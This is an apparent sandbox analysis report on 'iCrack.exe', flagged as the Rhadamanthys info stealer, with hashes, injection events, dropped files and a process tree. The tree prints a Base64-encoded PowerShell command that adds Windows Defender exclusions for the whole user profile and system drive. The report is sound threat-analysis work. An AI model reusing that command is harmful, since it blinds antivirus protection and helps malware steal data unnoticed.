Analysis
-
max time kernel
117s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
05-04-2024 00:11
Static task
static1
Behavioral task
behavioral1
Sample
DrakeUI.Framework.dll
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
DrakeUI.Framework.dll
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
config.dll
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
config.dll
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
d3dcompiler_47.dll
Resource
win10v2004-20240226-en
Behavioral task
behavioral6
Sample
iCrack.exe
Resource
win7-20240221-en
Behavioral task
behavioral7
Sample
iCrack.exe
Resource
win10v2004-20240319-en
Behavioral task
behavioral8
Sample
launcher.dll
Resource
win10v2004-20240226-en
General
-
Target
iCrack.exe
-
Size
4.8MB
-
MD5
f3b1dd838a59c419431c5aa86c1a4feb
-
SHA1
85ac1eb8a03bedcfbc3d44cedeb802f5cae2ea0a
-
SHA256
fad83422bd338909393c57663ab1bcafb94ec684f74fdb95aaad925e82567fa3
-
SHA512
dbaac6b3c531cd84eac6a9440534d18cbc599826357b1efe36cdd16be163bd68c6ddd4d3211efca0d5e8c2ca6868cfb0fb3c3e0584c515b89e1ab1cac8ef6889
-
SSDEEP
98304:1vW7Ru1fkpfVmr/V9JfzD+p05u9qgo67Smy9BHbCMMjgml7/lg+QXcAz:JibHmTJfzAyQRoRmA1H8eFsA
Malware Config
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
svchost.exedescription pid process target process PID 1404 created 1336 1404 svchost.exe Explorer.EXE -
Executes dropped EXE 3 IoCs
Processes:
svchost.exeexplorer.exeexplorer.exepid process 1404 svchost.exe 2528 explorer.exe 2600 explorer.exe -
Loads dropped DLL 5 IoCs
Processes:
iCrack.exeexplorer.exeexplorer.exepid process 1248 iCrack.exe 1248 iCrack.exe 1248 iCrack.exe 2528 explorer.exe 2600 explorer.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI25282\python310.dll upx behavioral6/memory/2600-35-0x000007FEF6560000-0x000007FEF69C6000-memory.dmp upx -
Detects Pyinstaller 1 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Local\explorer.exe pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
svchost.exedialer.exepowershell.exepid process 1404 svchost.exe 1404 svchost.exe 2496 dialer.exe 2496 dialer.exe 2496 dialer.exe 2496 dialer.exe 2332 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2332 powershell.exe -
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
iCrack.exeexplorer.exesvchost.exedescription pid process target process PID 1248 wrote to memory of 2332 1248 iCrack.exe powershell.exe PID 1248 wrote to memory of 2332 1248 iCrack.exe powershell.exe PID 1248 wrote to memory of 2332 1248 iCrack.exe powershell.exe PID 1248 wrote to memory of 2332 1248 iCrack.exe powershell.exe PID 1248 wrote to memory of 1404 1248 iCrack.exe svchost.exe PID 1248 wrote to memory of 1404 1248 iCrack.exe svchost.exe PID 1248 wrote to memory of 1404 1248 iCrack.exe svchost.exe PID 1248 wrote to memory of 1404 1248 iCrack.exe svchost.exe PID 1248 wrote to memory of 2528 1248 iCrack.exe explorer.exe PID 1248 wrote to memory of 2528 1248 iCrack.exe explorer.exe PID 1248 wrote to memory of 2528 1248 iCrack.exe explorer.exe PID 1248 wrote to memory of 2528 1248 iCrack.exe explorer.exe PID 2528 wrote to memory of 2600 2528 explorer.exe explorer.exe PID 2528 wrote to memory of 2600 2528 explorer.exe explorer.exe PID 2528 wrote to memory of 2600 2528 explorer.exe explorer.exe PID 1404 wrote to memory of 2496 1404 svchost.exe dialer.exe PID 1404 wrote to memory of 2496 1404 svchost.exe dialer.exe PID 1404 wrote to memory of 2496 1404 svchost.exe dialer.exe PID 1404 wrote to memory of 2496 1404 svchost.exe dialer.exe PID 1404 wrote to memory of 2496 1404 svchost.exe dialer.exe PID 1404 wrote to memory of 2496 1404 svchost.exe dialer.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1336
-
C:\Users\Admin\AppData\Local\Temp\iCrack.exe"C:\Users\Admin\AppData\Local\Temp\iCrack.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1248 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAegBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AegB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAeQB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwByACMAPgA="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2332
-
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1404
-
-
C:\Users\Admin\AppData\Local\explorer.exe"C:\Users\Admin\AppData\Local\explorer.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Users\Admin\AppData\Local\explorer.exe"C:\Users\Admin\AppData\Local\explorer.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2600
-
-
-
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2496
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.4MB
MD53f782cf7874b03c1d20ed90d370f4329
SHA108a2b4a21092321de1dcad1bb2afb660b0fa7749
SHA2562a382aff16533054e6de7d13b837a24d97ea2957805730cc7b08b75e369f58d6
SHA512950c039eb23ed64ca8b2f0a9284ebdb6f0efe71dde5bbf0187357a66c3ab0823418edca34811650270eea967f0e541eece90132f9959d5ba5984405630a99857
-
Filesize
4.4MB
MD5ce453607540a4b0e0c88476042d31791
SHA19fe09b42424e044a7c11aea2f214a3d86de8f5a1
SHA2569a10c5b653feff9be0898a0ae18f7479e36275896bd4482f1fec237cf9ce619c
SHA512f0fdcd4e5fdbc03d4a3bb1eee4b69c6bf2585a609f9fc56739e9320d1072a7935ce126e7dc737ad1592f64023c3a17d0e0dd659a5d3a4ee940ca2301e81912ee
-
Filesize
355KB
MD52ef91bf37b3da8cad6751b665bd4e6af
SHA15c15bbc721f91855388861d378cf9d26a140cead
SHA2565263ecab05efc0fda51526658fdfa446f6108c009b8c2ddc9dd93ba29ea691b7
SHA51216f1846fde3d65413d1c478b59761cb5b74c5fa4556c7234858010efc05e81e305c9054895e388e9de85f6a55d05d6ac0236ed85dcdce3b82b0a82b4986eb2a3